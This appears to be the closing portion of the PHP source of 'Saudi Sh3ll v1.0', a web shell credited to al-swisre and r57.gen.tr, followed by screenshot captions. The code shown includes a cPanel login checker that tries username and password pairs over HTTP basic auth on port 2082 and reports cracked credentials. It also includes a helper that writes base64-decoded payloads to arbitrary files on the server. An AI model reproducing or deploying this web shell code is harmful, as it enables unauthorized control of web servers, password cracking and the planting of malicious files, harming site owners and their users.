3886 $data = curl_exec($ch);
3887 if ( curl_errno($ch) == 28 ) {
3888 
3889 print "<b> Error : Connection timed out </b>";
3890 exit;}
3891 
3892 elseif ( curl_errno($ch) == 0 ){
3893 
3894 print
3895 "
3896 <b>found username : <font color='#FF0000'> $user </font> - password :
3897 <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);
3898 exit;}
3899 
3900 
3901 function cpanel_check($host,$user,$pass,$timeout){
3902 $ch = curl_init();
3903 curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
3904 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3905 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
3906 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
3907 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
3908 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
3909 $data = curl_exec($ch);
3910 if ( curl_errno($ch) == 28 ) {
3911 print "<b> Error : Connection timed out</b>";
3912 exit;}
3913 elseif ( curl_errno($ch) == 0 ){
3914 
3915 print
3916 "
3917 <b>found username : <font color='#FF0000'>$user</font> - password :
3918 <font color='#FF0000'>$pass </font></b><br>"; }curl_close($ch);
3919 exit; }
3920 
3921 
3922        function op_sa($f,$t) {
3923            $w = @fopen($f,"w") or @function_exists('file_put_contents');
3924            if($w){
3925                @fwrite($w,@base64_decode($t));
3926                @fclose($w);
3927            }
3928        }
3929 
3930 
3931   echo "</td></tr></table></div> |<b class='foter'>Progr4m3r by <a href='$pg?sws=ab'>al-swisre Edited: r57.gen.tr</a></b>|<b class='foter'>E-m4il : <a href='#'>oy3@hotmail.com</a></b>|<b class='foter'>r57 shell : <a target='_blank' href='http://r57.gen.tr'>r57 shell</a></b>| </html> ";
3932 
3933 
3934 
3935 ?>

Screenshot of Saudi Sh3ll v1.0

Saudi Shell screenshot

Saudi Shell screenshot